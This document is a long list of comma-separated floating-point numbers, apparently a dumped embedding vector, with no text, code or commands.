0.03938079997897148, 0.019530078396201134, -0.00006723712431266904, -0.0137657904997468, 0.002891253214329481, -0.03223920240998268, 0.012563378550112247, -0.006110436748713255, -0.0026762764900922775, -0.010129406116902828, -0.015624062158167362, -0.004900737665593624, -0.0021424787119030952, 0.047775816172361374, 0.019224010407924652, -0.02129361405968666, -0.007116090040653944, 0.0031280918046832085, -0.022051498293876648, -0.0071962508372962475, -0.005352552980184555, 0.013576319441199303, 0.0012024114839732647, 0.0029932758770883083, -0.017285576090216637, -0.017853988334536552, 0.015580338425934315, 0.016935784369707108, -0.006197884678840637, 0.009444396011531353, -0.023815035820007324, -0.004798715002834797, -0.012811148539185524, 0.03253069892525673, 0.03229750320315361, -0.0013098998460918665, 0.011674323119223118, -0.01540544256567955, -0.02110414393246174, 0.007986927404999733, -0.02034625969827175, -0.008292995393276215, 0.001735298428684473, 0.021628832444548607, -0.003091654973104596, -0.02022966369986534, 0.006922975182533264, 0.013051630929112434, -0.001176905818283558, 0.006398286670446396, -0.0015330746537074447, 0.0008207369246520102, 0.007393009029328823, -0.004973611328750849, -0.03320113196969032, -0.0017316547455266118, 0.005695058032870293, -0.0028019831515848637, 0.00709422817453742, -0.016250774264335632, -0.006474803667515516, -0.021133292466402054, 0.01754792034626007, 0.004069980699568987, 0.02772105112671852, -0.019777847453951836, 0.00544364470988512, 0.008161823265254498, 0.006241608876734972, -0.004128279630094767, 0.008708374574780464, 0.004423417150974274, -0.04048847407102585, 0.019005389884114265, -0.0057205636985599995, 0.019530078396201134, 0.023625563830137253, 0.00879582203924656, 0.00017865376139525324, -0.008883270435035229, -0.0007036839961074293, -0.03194770961999893, -0.008824971504509449, -0.010450049303472042, -0.036611609160900116, 0.01867017149925232, 0.006627838127315044, 0.016688015311956406, 0.006478447467088699, -0.011718046851456165, 0.007731870282441378, -0.04104231297969818, -0.013612755574285984, -0.01718355342745781, 0.0067262169905006886, -0.021395638585090637, 0.01313907839357853, -0.0045618764124810696, -0.004248520825058222, 0.01025329064577818, 0.008402305655181408, -0.01820378191769123, -0.023479817435145378, 0.0073237791657447815, 0.017562495544552803, 0.005782506428658962, -0.011659747920930386, 0.007225400302559137, 0.029105646535754204, -0.0008098059333860874, -0.018757618963718414, 0.01534714363515377, 0.01665886491537094, -0.01273098774254322, 0.003255620365962386, 0.01130266860127449, 0.00024389824829995632, 0.015026500448584557, -0.019661249592900276, 0.022765658795833588, -0.019486354663968086, 0.03235580027103424, 0.012891309335827827, 0.0015631349524483085, 0.02181830443441868, 0.009014442563056946, -0.014516386203467846, 0.004984542261809111, 0.010063819587230682, 0.008824971504509449, -0.014939052052795887, -0.011251657269895077, 0.008023364469408989, -0.002599759493023157, -0.016615141183137894, 0.013146365992724895, 0.007239975035190582, 0.016935784369707108, 0.003558045020326972, -0.025185056030750275, 0.0283186137676239, 0.015551188960671425, 0.0014984598383307457, 0.0030060287099331617, -0.012833010405302048, -0.026365606114268303, -0.005797081161290407, -0.005250530317425728, -0.01528884470462799, 0.004529083613306284, -0.007556974422186613, 0.016309073194861412, -0.020972972735762596, -0.0004709445056505501, -0.029440863057971, -0.03681565448641777, 0.007979639805853367, -0.018947090953588486, 0.027094339951872826, -0.021279040724039078, -0.0015686005353927612, -0.012935033068060875, 0.016090452671051025, 0.012417631223797798, -0.001021138858050108, -0.0006941193714737892, 0.0047440598718822, 0.006412861403077841, -0.017941437661647797, 0.0012543338816612959, -0.0291930940002203, 0.010501060634851456, 0.025549422949552536, -0.029426289722323418, -0.024237701669335365, -0.006558608263731003, -0.01418845634907484, -0.002709069522097707, -0.0018874217057600617, 0.0038222111761569977, 0.002129725879058242, -0.011178783141076565, 0.008307570591568947, 0.02401908114552498, -0.0008307570242322981, 0.012563378550112247, -0.017110681161284447, 0.012891309335827827, 0.0027837648522108793, 0.028333187103271484, -0.010428187437355518, 0.014421651139855385, 0.005002760794013739, -0.0038367859087884426, 0.018218357115983963, 0.029761506244540215, 0.005582104437053204, 0.007021354511380196, -0.0007510517607443035, 0.0019019964383915067, 0.0015758877852931619, -0.02241586521267891, 0.007775594480335712, 0.018466126173734665, 0.019398905336856842, 0.017737392336130142, -0.010187705047428608, -0.016790037974715233, -0.016454819589853287, -0.01537629310041666, 0.02378588542342186, -0.009451683610677719, -0.0026015813928097486, -0.0014847960555925965, -0.0018427867908030748, 0.010654094628989697, -0.018276654183864594, 0.02635103091597557, 0.0005388078861869872, 0.008008789271116257, 0.006216103211045265, 0.018160058185458183, 0.0033959015272557735, -0.012286459095776081, 0.009407958947122097, 0.017168978229165077, -0.007221756502985954, 0.011761770583689213, 0.009961796924471855, 0.012709124945104122, 0.011054898612201214, -0.01885964162647724, -0.009735889732837677, -0.014399789273738861, -0.004113704897463322, 0.01106218621134758, -0.003355821128934622, -0.006653343793004751, -0.029994701966643333, 0.011849218979477882, 0.013270250521600246, -0.010216854512691498, 0.007804743945598602, -0.017518771812319756, 0.005589391570538282, -0.01043547410517931, -0.012781999073922634, -0.013255676254630089, -0.009677590802311897, -0.010158555582165718, -0.006861032918095589, -0.01186379324644804, -0.004940818063914776, 0.008788535371422768, -0.013117216527462006, -0.001156865619122982, 0.006117723882198334, 0.01588640734553337, 0.017023231834173203, 0.006919331848621368, 0.007870329543948174, 0.0014219427248463035, 0.023144599050283432, -0.004223015159368515, -0.007914054207503796, -0.004394267685711384, 0.0033376028295606375, 0.010960163548588753, -0.00011101811105618253, -0.008241984061896801, -0.0049954731948673725, -0.008759385906159878, -0.0006094039999879897, -0.012694550678133965, 0.012942320667207241, 0.011113197542726994, -0.0056112539023160934, -0.010420899838209152, -0.004540014546364546, -0.001219718949869275, 0.009830624796450138, 0.004361474420875311, 0.015959279611706734, -0.010559359565377235, -0.00803065113723278, -0.011769058182835579, 0.0028220233507454395, -0.014246754348278046, -0.008992580696940422, -0.011186070740222931, -0.0067626540549099445, -0.007301917299628258, -0.012577952817082405, 0.007393009029328823, 0.011317242868244648, -0.008198260329663754, 0.00984519999474287, 0.01186379324644804, -0.0028074486181139946, 0.018597297370433807, 0.013518020510673523, -0.013029768131673336, -0.017708241939544678, 0.016046728938817978, -0.005170369520783424, 0.0021497660782188177, -0.020069342106580734, 0.004733128938823938, 0.003437803825363517, -0.028216591104865074, 0.015624062158167362, 0.0013244744623079896, 0.018582724034786224, 0.001579531468451023, -0.014166593551635742, 0.002940442645922303, -0.012177149765193462, -0.0045946696773171425, 0.012315608561038971, -0.016075877472758293, -0.018043460324406624, -0.017285576090216637, 0.013692916370928288, 0.037311192601919174, -0.01730015128850937, 0.001545827486552298, -0.0031335572712123394, -0.032793041318655014, 0.0031809250358492136, -0.023931633681058884, -0.0007915875758044422, 0.027371259406208992, -0.0026434834580868483, 0.0064675165340304375, -0.002177093643695116, -0.017081530764698982, -0.002572431927546859, 0.019777847453951836, 0.033580075949430466, 0.00990349892526865, -0.007378434296697378, -0.029994701966643333, 0.00900715496391058, -0.0015194108709692955, 0.005312472581863403, 0.0004846082883886993, 0.0016487612156197429, -0.0192677341401577, 0.009407958947122097, 0.023450668901205063, -0.0066132633946835995, -0.04710538312792778, 0.009553706273436546, 0.007174388505518436, -0.02426685020327568, 0.006001126486808062, 0.006398286670446396, -0.000743764394428581, 0.0137657904997468, -0.005378058645874262, 0.007863042876124382, 0.0005729672848246992, 0.023275772109627724, 0.009174764156341553, 0.0023465242702513933, -0.0047039794735610485, -0.013569031842052937, 0.01849527470767498, -0.012884021736681461, -0.00617237901315093, -0.0005101139540784061, -0.014006271958351135, -0.03086918219923973, -0.02652592770755291, 0.0003179103077854961, -0.007863042876124382, -0.029163945466279984, 0.009560992941260338, 0.010078394785523415, -0.009772326797246933, -0.0033940798602998257, -0.00401532556861639, -0.00021076361008454114, 0.016804611310362816, 0.002648948924615979, 0.01563863642513752, 0.002546926261857152, -0.029878104105591774, 0.009743177331984043, 0.004259451758116484, 0.005374415311962366, 0.00817639846354723, 0.002450368832796812, 0.024354299530386925, -0.00493717473000288, 0.007298273500055075, -0.0038477168418467045, 0.0239607822149992, -0.007119733840227127, 0.022751083597540855, -0.0018072609091177583, 0.006208815611898899, -0.008016076870262623, 0.0006139586330391467, -0.013255676254630089, -0.014370639808475971, 0.0048679448664188385, -0.02914937026798725, -0.008788535371422768, -0.005775218829512596, -0.03086918219923973, -0.016848335042595863, -0.0014838851056993008, -0.0014110116753727198, -0.01222087349742651, -0.013430572114884853, -0.0017334766453132033, -0.018480701372027397, -0.009371522814035416, -0.0038732225075364113, 0.011018461547791958, -0.01635279692709446, 0.01486617885529995, 0.0017881316598504782, 0.018597297370433807, -0.005760644096881151, 0.011732621118426323, -0.04305361956357956, -0.00047868731780909, 0.02063775435090065, 0.007892192341387272, 0.0058699543587863445, 0.015143097378313541, -0.01689206063747406, 0.02480611391365528, -0.00002806765587592963, 0.009582855738699436, 0.0021643408108502626, 0.012366619892418385, -0.015390867367386818, -0.012847584672272205, -0.0073456414975225925, 0.005403564311563969, 0.005243243183940649, 0.01067595649510622, 0.011127771809697151, 0.0033959015272557735, 0.01754792034626007, 0.006150517147034407, -0.009619291871786118, 0.026992317289114, -0.004929887130856514, -0.018830493092536926, 0.02461664378643036, 0.0066132633946835995, -0.0267008226364851, -0.005294254515320063, 0.02081265114247799, -0.019938169047236443, -0.015492890030145645, -0.02046285755932331, -0.008730236440896988, 0.031189825385808945, -0.006817308720201254, 0.026482202112674713, 0.008548052981495857, -0.000025961157007259317, -0.018815917894244194, 0.002771012019366026, -0.002984166843816638, -0.007535112090408802, -0.005910034757107496, 0.04217913746833801, 0.009721314534544945, -0.014407075941562653, 0.0032884133979678154, 0.006281689275056124, -0.0018928871722891927, 0.013306687586009502, 0.015915555879473686, -0.015492890030145645, 0.017285576090216637, 0.004233946092426777, -0.0165276937186718, -0.01814548298716545, 0.002809270517900586, 0.016367372125387192, -0.020375410094857216, 0.013175515457987785, 0.0029185807798057795, 0.001088546821847558, 0.00741851469501853, -0.005399920977652073, 0.012891309335827827, 0.0037748434115201235, 0.031597916036844254, 0.012271884828805923, 0.018947090953588486, 0.011776345781981945, -0.015449166297912598, -0.008336720056831837, -0.0045728073455393314, -0.004459853749722242, 0.001146845519542694, 0.027968820184469223, -0.015726085752248764, -0.004853370133787394, -0.0039788889698684216, 0.00909460335969925, -0.02181830443441868, -0.009021730162203312, -0.009131040424108505, 0.006955768447369337, 0.00924763735383749, -0.016090452671051025, -0.005968333687633276, 0.024223126471042633, 0.011812781915068626, 0.0034542004577815533, 0.0038732225075364113, 0.009765039198100567, -0.024398023262619972, 0.012060551904141903, -0.011258943937718868, 0.0013308508787304163, 0.005662265233695507, 0.016192475333809853, -0.01600300334393978, -0.023348646238446236, 0.01593013107776642, 0.002045921515673399, -0.01915113627910614, -0.00407362449914217, -0.038098227232694626, -0.0025560352951288223, 0.013896962627768517, 0.019894445315003395, 0.019355181604623795, 0.0045618764124810696, -0.006278045475482941, -0.003053396474570036, -0.014348777011036873, -0.008650075644254684, 0.01233747135847807, -0.013547169975936413, 0.007607985753566027, -0.002075070748105645, -0.0008940658299252391, -0.0097577515989542, 0.023625563830137253, 0.029994701966643333, -0.013328549452126026, -0.011572299525141716, 0.009641153737902641, 0.003038821741938591, -0.020681478083133698, -0.01165246032178402, 0.004204796627163887, 0.019121985882520676, 0.00407362449914217, -0.008241984061896801, 0.006973986979573965, -0.014093720354139805, 0.0029422645457088947, -0.01915113627910614, -0.02331949584186077, -0.02772105112671852, -0.0021515879780054092, -0.0039060155395418406, -0.012541516683995724, -0.0406925193965435, 0.02009849064052105, 0.0012898596469312906, 0.00042471542838029563, 0.010151267983019352, -0.0038622915744781494, 0.011827357113361359, -0.011098622344434261, 0.001196035067550838, 0.0023829611018300056, -0.007695433683693409, -0.022882254794239998, -0.002741862554103136, 0.002249967074021697, 0.004809645935893059, -0.007578836288303137, 0.02100212126970291, 0.0011104088043794036, 0.007159814238548279, -0.03069428727030754, -0.025957513600587845, -0.006536746397614479, 0.005399920977652073, -0.006842814851552248, 0.042441483587026596, -0.0165276937186718, -0.006241608876734972, -0.022751083597540855, -0.012388482689857483, 0.003532539354637265, -0.006026632152497768, 0.0005315205198712647, -0.006620550528168678, 0.002985988510772586, 0.010282440111041069, 0.008169110864400864, 0.00233377143740654, 0.011069472879171371, 0.002523242263123393, -0.02783764898777008, -0.027910521253943443, -0.003528895555064082, 0.03092748112976551, -0.0007232687203213573, 0.008292995393276215, -0.007152526639401913, -0.01969039998948574, -0.012636251747608185, -0.002517776796594262, 0.008584489114582539, -0.026074111461639404, -0.0189762394875288, 0.0006800001719966531, -0.009735889732837677, 0.003266551299020648, 0.027196362614631653, 0.020185938104987144, 0.013758502900600433, 0.014049996621906757, -0.0026325525250285864, 0.009918073192238808, 0.02098754607141018, 0.004663899075239897, -0.006022988818585873, 0.01920943520963192, 0.015332568436861038, -0.0014474483905360103, 0.011936667375266552, -0.0008790356805548072, 0.012752849608659744, -0.020623179152607918, 0.016075877472758293, 0.006387355737388134, 0.01754792034626007, -0.004408842418342829, 0.004769565537571907, 0.008125387132167816, -0.0030661493074148893, -0.020142214372754097, -0.011739908717572689, -0.01974869892001152, 0.005491012707352638, 0.011994965374469757, 0.026511352509260178, 0.007841181010007858, -0.0064347232691943645, 0.012716412544250488, 0.005399920977652073, 0.004467140883207321, 0.00002237441913166549, -0.00132265267893672, -0.021264465525746346, -0.019238583743572235, 0.013459721580147743, 0.016513118520379066, 0.00844603031873703, -0.02812914177775383, 0.0024357943329960108, -0.0016023044008761644, -0.03191855922341347, -0.015857256948947906, -0.00685374578461051, -0.0018263902748003602, -0.00434325635433197, -0.015041074715554714, -0.02830403856933117, -0.007928628474473953, 0.003532539354637265, 0.006952124647796154, 0.0074695260263979435, -0.0010867249220609665, 0.008132674731314182, 0.008016076870262623, 0.0021115075796842575, -0.010697819292545319, -0.00415014149621129, -0.018349528312683105, 0.005388989578932524, -0.01483702939003706, 0.0006599599728360772, 0.029032772406935692, -0.04497747868299484, -0.014530961401760578, -0.015157672576606274, -0.0010001877089962363, 0.0047258418053388596, 0.015594912692904472, -0.006369137205183506, -0.0012771068140864372, -0.01837867870926857, 0.00048643010086379945, -0.001318098045885563, -0.010690531693398952, -0.025053882971405983, 0.01789771392941475, -0.01802888512611389, -0.014152019284665585, -0.004518152214586735, -0.006350919138640165, -0.017562495544552803, 0.0018291230080649257, 0.0003850905050057918, 0.010566646233201027, 0.0073456414975225925, -0.00930593628436327, -0.0050136917270720005, -0.028712129220366478, -0.008256559260189533, -0.008256559260189533, -0.019646676257252693, 0.014611122198402882, -0.0001089685465558432, -0.004022613167762756, -0.013394135981798172, 0.010982025414705276, 0.016994083300232887, 0.017751965671777725, -0.008650075644254684, 0.009597430005669594, 0.014727719128131866, 0.0018892436055466533, -0.026380179449915886, 0.007247262168675661, -0.02247416414320469, -0.005130289122462273, -0.0062598274089396, 0.005414495710283518, 0.00034819834399968386, -0.014101007953286171, -0.004838795401155949, -0.014108295552432537, 0.014771442860364914, -0.013853237964212894, 0.03567882999777794, -0.020885523408651352, 0.004408842418342829, -0.0008671937393955886, 0.01581353321671486, -0.009910785593092442, 0.007014067377895117, -0.007072365842759609, -0.02141021192073822, 0.012745562009513378, 0.016935784369707108, 0.004529083613306284, -0.012614389881491661, -0.02033168636262417, -0.006915688049048185, -0.010450049303472042, -0.01563863642513752, -0.009131040424108505, -0.005061059258878231, 0.003756625112146139, -0.011295381002128124, -0.008759385906159878, 0.009735889732837677, 0.029047347605228424, -0.011105909943580627, -0.009612005203962326, 0.013488871045410633, 0.012206298299133778, 0.008781247772276402, 0.001054842839948833, -0.0016615140484645963, -0.033580075949430466, 0.018713895231485367, -0.0070177107118070126, 0.004437991417944431, 0.017402173951268196, 0.01759164407849312, -0.016381945461034775, -0.00012957805301994085, -0.004405198618769646, -0.003913302905857563, -0.0092184878885746, -0.03451285511255264, -0.02633645571768284, 0.00015405897283926606, 0.007451307959854603, 0.018334953114390373, -0.03153961896896362, -0.0026562362909317017, 0.0010511991567909718, -0.014443513005971909, -0.009852486662566662, -0.007462238892912865, 0.032501548528671265, -0.006635125260800123, -0.014873466454446316, -0.011528575792908669, -0.012454068288207054, 0.01955922693014145, 0.013780364766716957, 0.02106042020022869, -0.0015777096850797534, 0.012483217753469944, 0.01373664103448391, 0.0012315608328208327, 0.000860361906234175, 0.010785266757011414, 0.02492271177470684, 0.0025596790947020054, -0.00787761714309454, -0.008249271661043167, 0.0242085512727499, 0.024966435506939888, 0.014676707796752453, 0.01581353321671486, -0.004091843031346798, 0.008919707499444485, 0.021133292466402054, 0.01807260885834694, -0.005818943027406931, 0.02598666399717331, 0.009553706273436546, 0.01670258864760399, 0.002211708575487137, -0.020317111164331436, 0.0022226395085453987, 0.014436225406825542, 0.00529061071574688, -0.010712393559515476, -0.00609586201608181, -0.004853370133787394, 0.027983395382761955, 0.035124991089105606, 0.0017917753430083394, 0.003964314237236977, 0.012512367218732834, 0.028333187103271484, -0.00022249168250709772, 0.0041428543627262115, -0.009342373348772526, -0.0017097927629947662, -0.006503953132778406, -0.00033612866536714137, -0.01718355342745781, 0.00101111875846982, 0.01025329064577818, -0.016906633973121643, 0.003554401220753789, -0.011317242868244648, 0.014195743016898632, -0.012723700143396854, 0.024048229679465294, -0.02617613412439823, 0.0025870066601783037, 0.00026211660588160157, 0.004652968142181635, -0.006784515921026468, 0.013445147313177586, -0.027283810079097748, -0.00862821377813816, -0.010559359565377235, 0.006292620208114386, 0.02521420456469059, 0.00512664532288909, -0.02391705848276615, -0.003898728173226118, -0.01664428971707821, -0.016673440113663673, -0.015143097378313541, 0.012556090950965881, -0.02837691269814968, 0.01861187256872654, -0.008497041650116444, -0.010377176105976105, -0.000471399980597198, 0.01658599078655243, -0.024427171796560287, -0.004951749462634325, 0.003377683227881789, -0.03885611146688461, 0.005895460024476051, -0.006769941188395023, -0.00859906431287527, -0.006529458798468113, 0.011579587124288082, -0.009947222657501698, 0.018568148836493492, 0.009415246546268463, -0.002120616612955928, 0.012497792020440102, 0.0025104894302785397, 0.00827113352715969, 0.000996544142253697, -0.006820952519774437, -0.01267268881201744, -0.0009765038848854601, 0.00615416094660759, -0.01593013107776642, -0.000016040692571550608, -0.004674830008298159, -0.011572299525141716, -0.010573933832347393, 0.03270559385418892, 0.004408842418342829, 0.013547169975936413, -0.0019766916520893574, 0.008912419900298119, -0.003825854742899537, -0.0016405630158260465, 0.0053197601810097694, -0.008132674731314182, 0.019486354663968086, 0.00022249168250709772, 0.0015713332686573267, -0.005647690501064062, 0.01064680702984333, -0.016090452671051025, 0.008402305655181408, 0.019661249592900276, -0.021468510851264, -0.022940553724765778, -0.012847584672272205, 0.012781999073922634, 0.006514884065836668, -0.01735845021903515, -0.008008789271116257, -0.02878500334918499, 0.0198069978505373, 0.010246003977954388, 0.014319628477096558, -0.007433089427649975, -0.0027874084189534187, -0.013911536894738674, -0.005104783456772566, 0.022984277456998825, 0.003583550686016679, -0.0035981254186481237, 0.0032592639327049255, -0.017168978229165077, 0.01581353321671486, -0.0003165439411532134, -0.0013007906964048743, 0.0005943738506175578, -0.002849350916221738, 0.011871080845594406, 0.004554589278995991, 0.009284074418246746, 0.003742050379514694, -0.0119803911074996, -0.009910785593092442, -0.012468643486499786, -0.0037602686788886786, -0.018276654183864594, 0.0022955129388719797, -0.006839171051979065, 0.006299907807260752, -0.018276654183864594, 0.020827224478125572, 0.03104407899081707, 0.013474296778440475, -0.0220077745616436, 0.025942940264940262, 0.0115431509912014, 0.015624062158167362, -0.00021998665761202574, 0.010726967826485634, 0.003621809184551239, 0.01076340489089489, 0.009386097081005573, 0.00951726920902729, -0.011324530467391014, -0.0021606970112770796, -0.007527824956923723, -0.006106792949140072, 0.009502694942057133, 0.00039260557969100773, 0.008613638579845428, 0.029703207314014435, 0.017649943009018898, -0.0008722037891857326, -0.0069084009155631065, -0.0026617017574608326, -0.03876866400241852, 0.007695433683693409, 0.0063035511411726475, 0.008846834301948547, -0.01243220642209053, -0.023348646238446236, 0.01826208084821701, -0.00545457610860467, 0.0053051854483783245, -0.004295888356864452, -0.020419133827090263, -0.012155286967754364, 0.00951726920902729, 0.015055649913847446, -0.0015175890875980258, 0.004233946092426777, -0.010544784367084503, -0.014115582220256329, 0.017081530764698982, 0.01477873045951128, 0.005658621434122324, 0.02111871913075447, 0.001764447777532041, 0.008737524040043354, 0.0028019831515848637, -0.013146365992724895, -0.009480833075940609, -0.00933508574962616, -0.0022153521422296762, -0.008766673505306244, -0.00927678681910038, -0.004492646548897028, 0.006529458798468113, 0.008606351912021637, 0.01373664103448391, -0.008861408568918705, 0.007680858951061964, 0.023406943306326866, 0.02955746091902256, 0.0067480793222785, 0.012060551904141903, 0.0002039317332673818, 0.029513737186789513, 0.0031299137044698, -0.0025104894302785397, 0.015157672576606274, -0.020827224478125572, 0.021716279909014702, 0.005327047314494848, -0.020681478083133698, -0.030169598758220673, -0.008132674731314182, 0.010187705047428608, 0.005181300453841686, 0.012454068288207054, -0.01807260885834694, 0.010406325571238995, -0.007152526639401913, 0.02193490043282509, 0.0052869669161736965, -0.0017571604112163186, 0.0066169071942567825, 0.0037748434115201235, -0.011011174879968166, -0.004736772738397121, 0.023581840097904205, -0.01665886491537094, 0.016483968123793602, -0.00930593628436327, 0.012184436433017254, -0.009932647459208965, 0.0023829611018300056, 0.04150870442390442, -0.022342992946505547, -0.007414870895445347, -0.009590142406523228, 0.012774711474776268, -0.006223390344530344, 0.010209566913545132, 0.0009892567759379745, -0.0025778973940759897, 0.0023884265683591366, -0.00022579375945497304, 0.002095110947266221, 0.006518527865409851, 0.004452566150575876, 0.011295381002128124, -0.005542024038732052, -0.020113065838813782, -0.009233063086867332, 0.0033066316973417997, -0.018305804580450058, 0.00264530535787344, -0.009240350686013699, 0.01383137609809637, -0.018451550975441933, 0.0059974826872348785, -0.001565867685712874, -0.011419265531003475, 0.0052833231166005135, -0.027094339951872826, 0.004583738278597593, -0.008722948841750622, -0.0010357135906815529, 0.002249967074021697, 0.002958661178126931, -0.0017079708632081747, -0.003286591498181224, 0.014560109935700893, -0.008584489114582539, 0.013146365992724895, 0.014275903813540936, -0.018305804580450058, 0.005257817450910807, 0.024835262447595596, 0.006518527865409851, 0.022692784667015076, 0.0061942413449287415, -0.019850721582770348, -0.017941437661647797, -0.03588287532329559, 0.008045226335525513, -0.009728602133691311, 0.0027254661545157433, -0.013787652365863323, 0.017853988334536552, -0.007462238892912865, 0.010938300751149654, 0.019005389884114265, -0.019544653594493866, 0.009801475331187248, 0.00803065113723278, -0.0058881728909909725, -0.017518771812319756, -0.006813665386289358, 0.0023938920348882675, 0.009109178557991982, -0.003855004208162427, -0.02337779477238655, 0.014479950070381165, 0.005440001375973225, -0.008482466451823711, 0.009939935058355331, -0.005214093718677759, 0.014195743016898632, -0.020550305023789406, -0.004682117607444525, 0.00547279417514801, -0.01944262906908989, -0.030053000897169113, 0.007239975035190582, -0.000010368807124905288, -0.007290986366569996, -0.00868651270866394, -0.00666063092648983, 0.001764447777532041, -0.007258193101733923, 0.0006071267416700721, -0.003213718067854643, -0.004940818063914776, -0.02581176720559597, 0.009830624796450138, 0.022561611607670784, 0.005075633991509676, 0.013430572114884853, -0.019282307475805283, -0.026132410392165184, 0.013641905039548874, -0.00728369876742363, 0.017883138731122017, 0.0016943071968853474, 0.011987678706645966, 0.0002630275266710669, -0.028916174545884132, -0.00271271332167089, 0.008824971504509449, 0.009262212552130222, -0.0009364235447719693, -0.0021115075796842575, -0.0027928741183131933, 0.006955768447369337, -0.001239759149029851, 0.017475048080086708, -0.02116244286298752, 0.004747703671455383, 0.010617658495903015, -0.01052292250096798, 0.00547279417514801, -0.025068458169698715, 0.005629471968859434, -0.014997350983321667, -0.019909020513296127, -0.017970586195588112, -0.008438742719590664, -0.016425669193267822, -0.024106528609991074, -0.005039197392761707, -0.030665136873722076, 0.010289727710187435, -0.014909902587532997, 0.00205138698220253, -0.012847584672272205, -0.003568975953385234, 0.01213342510163784, 0.0006440188735723495, 0.024893561378121376, -0.002120616612955928, -0.0030114944092929363, 0.018626447767019272, -0.001161420252174139, 0.006602332461625338, -0.0025305296294391155, 0.012956894934177399, 0.021395638585090637, -0.025709744542837143, 0.00823469739407301, -0.001696128980256617, 0.0008690155809745193, 0.01695035956799984, -0.007542399689555168, 0.008737524040043354, 0.003558045020326972, -0.012993331998586655, 0.0009008977212943137, 0.0195155031979084, 0.018699320033192635, -0.0028803220484405756, 0.012811148539185524, 0.006992205046117306, -0.0008776693139225245, 0.021730855107307434, 0.006635125260800123, 0.006190597545355558, -0.006103149149566889, 0.003927877638489008, -0.006820952519774437, 0.0018154592253267765, 0.01210427563637495, 0.017460472881793976, -0.001298057846724987, 0.02984895557165146, 0.004379692953079939, -0.024660367518663406, -0.010573933832347393, -0.008292995393276215, -0.014545535668730736, 0.004390623886138201, -0.0026853857561945915, 0.0019220366375520825, 0.012993331998586655, 0.008744810707867146, 0.009837912395596504, -0.015609487891197205, 0.003353999461978674, 0.009706740267574787, 0.012264597229659557, -0.029061922803521156, -0.007393009029328823, -0.02735668420791626, -0.005658621434122324, -0.02366928942501545, -0.010843565687537193, -0.004153785295784473, -0.01189294271171093, -0.00039989291690289974, -0.011900230310857296, -0.003408654360100627, 0.017096105962991714, -0.001896530855447054, 0.011637886054813862, -0.009553706273436546, -0.0006212459411472082, 0.00038281321758404374, -0.019136561080813408, 0.011076760478317738, 0.003840429475530982, 0.023406943306326866, 0.006190597545355558, -0.006285333074629307, -0.01168160978704691, -0.004536370746791363, -0.0014620231231674552, -0.008584489114582539, 0.00859906431287527, -0.011572299525141716, -0.003408654360100627, -0.013372273184359074, 0.006656987592577934, -0.010982025414705276, 0.007116090040653944, -0.02081265114247799, 0.0057242074981331825, 0.011776345781981945, 0.01974869892001152, 0.02259076200425625, 0.0007929539424367249, -0.010246003977954388, -0.010938300751149654, 0.019763272255659103, 0.017387598752975464, -0.01576980948448181, 0.04249978065490723, -0.0002616611309349537, -0.008402305655181408, -0.01219172403216362, 0.0003645948600023985, -0.016148751601576805, 0.0013153653126209974, 0.006664274726063013, 0.013452433981001377, -0.005673196166753769, 0.005603966303169727, 0.026598799973726273, 0.0009373344364576042, -0.007972353138029575, -0.03343432769179344, 0.01240305695682764, 0.0007574281771667302, -0.008227409794926643, 0.008081662468612194, 0.0005552044021897018, -0.009896211326122284, -0.01537629310041666, -0.014552823267877102, 0.0024558345321565866, 0.004827864468097687, 0.024602068588137627, -0.004791427869349718, 0.012322896160185337, 0.01397712342441082, 0.02984895557165146, 0.009371522814035416, 0.0038185673765838146, 0.01588640734553337, -0.017620794475078583, -0.0018345884745940566, -0.013241101056337357, -0.00615416094660759, 0.003184568602591753, 0.011266231536865234, 0.0022864036727696657, 0.011426553130149841, 0.0024285069666802883, -0.009699452668428421, 0.011586874723434448, 0.007294629700481892, -0.02087094821035862, 0.031306423246860504, -0.0033230280969291925, 0.011419265531003475, 0.010952875949442387, 0.012862159870564938, -0.007349284831434488, -0.009976372122764587, -0.011696184985339642, 0.015434591099619865, 0.016192475333809853, 0.013794939033687115, 0.008613638579845428, 0.01213342510163784, 0.012264597229659557, 0.024412596598267555, -0.00019413935660850257, 0.009386097081005573, 0.011040324345231056, 0.038448020815849304, 0.01168160978704691, 0.032326649874448776, -0.0009409781196154654, 0.01760621927678585, 0.009765039198100567, 0.011288093402981758, -0.01932603307068348, 0.005225024651736021, 0.014239467680454254, -0.028770428150892258, -0.00832943245768547, -0.005727851297706366, 0.012424918822944164, 0.006525815464556217, -0.011973103508353233, 0.005804368294775486, -0.014851603657007217, 0.003310275264084339, 0.015332568436861038, -0.016032153740525246, -0.02015678957104683, -0.008883270435035229, 0.02741498313844204, 0.003887797240167856, -0.007593411020934582, 0.032851338386535645, -0.010369888506829739, 0.004062693566083908, -0.004066337365657091, 0.001716169179417193, -0.00830028299242258, -0.0007369325030595064, -0.004423417150974274, 0.0008635501144453883, 0.006587757728993893, 0.01085085328668356, 0.0010092969750985503, -0.007444020360708237, 0.0021023983135819435, -0.006944837514311075, -0.013962548226118088, 0.020841799676418304, 0.0020860019139945507, -0.003534361021593213, -0.016265349462628365, -0.01660056598484516, -0.004798715002834797, 0.0012270063161849976, -0.01094558835029602, -0.006227034144103527, -0.0076152728870511055, -0.0022044212091714144, -0.005705989431589842, -0.0034833496902137995, -0.022328417748212814, 0.015332568436861038, 0.024966435506939888, 0.0070177107118070126, -0.021206166595220566, -0.007622560486197472, -0.015842681750655174, 0.0006681582308374345, 0.0071780323050916195, -0.010894577018916607, 0.00362727465108037, 0.0003445546608418226, -0.024543769657611847, 0.004922599997371435, -0.026773696765303612, 0.00865736324340105, 0.02253246307373047, 0.03229750320315361, -0.01308077946305275, 0.016396520659327507, -0.013824088498950005, -0.010107544250786304, 0.010566646233201027, -0.005214093718677759, 0.013211951591074467, 0.017023231834173203, -0.007637134753167629, -0.001210609800182283, -0.012155286967754364, -0.020666902884840965, -0.007578836288303137, -0.012526941485702991, 0.010428187437355518, 0.018713895231485367, 0.005644046701490879, 0.000241848683799617, -0.0016505831154063344, -0.012475930154323578, 0.0035908380523324013, -0.001784487976692617, -0.005294254515320063, 0.002867569215595722, -0.0003798527177423239, 0.017212703824043274, 0.015857256948947906, -0.008905132301151752, 0.006839171051979065, 0.002546926261857152, 0.021279040724039078, -0.01011483184993267, -0.014370639808475971, 0.014261329546570778, -0.008139961399137974, 0.0025287079624831676, -0.01961752586066723, -0.023887908086180687, -0.021789154037833214, 0.011375541798770428, 0.004612887743860483, 0.017518771812319756, -0.03614521771669388, 0.004040831234306097, -0.002162518911063671, -0.011098622344434261, 0.02984895557165146, -0.002989632310345769, 0.008037938736379147, 0.017285576090216637, -0.018116334453225136, 0.004080911632627249, 